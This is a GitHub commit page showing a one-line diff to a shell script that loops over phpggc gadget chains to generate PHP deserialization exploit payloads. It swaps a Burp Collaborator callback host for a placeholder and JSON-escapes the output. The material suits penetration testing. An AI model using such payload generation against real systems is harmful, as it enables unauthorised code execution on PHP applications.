Skip to content

Commit

Permalink
Update genpayloads.sh
Browse files Browse the repository at this point in the history
  • Loading branch information
ricardojba authored Dec 20, 2023
1 parent ce539b8 commit d5bb487
Showing 1 changed file with 1 addition and 1 deletion.
2 changes: 1 addition & 1 deletion genpayloads.sh
Original file line number Diff line number Diff line change
Expand Up @@ -18,7 +18,7 @@ while read line; do
elif echo $line | /bin/grep -q "<command>"; then
echo -e "\n"
echo $gadget "<command>"
~/phpggc/phpggc $options $gadget "$command?$(date +%s)" | sed 's/poi-slinger.aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.oastify.com/CHANGEME/g' | jq -aR .
~/phpggc/phpggc $options $gadget "$command" | sed 's/poi-slinger.aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.oastify.com/CHANGEME/g' | jq -aR .
else
echo -e "\n"
echo $gadget
Expand Down

0 comments on commit d5bb487

Please sign in to comment.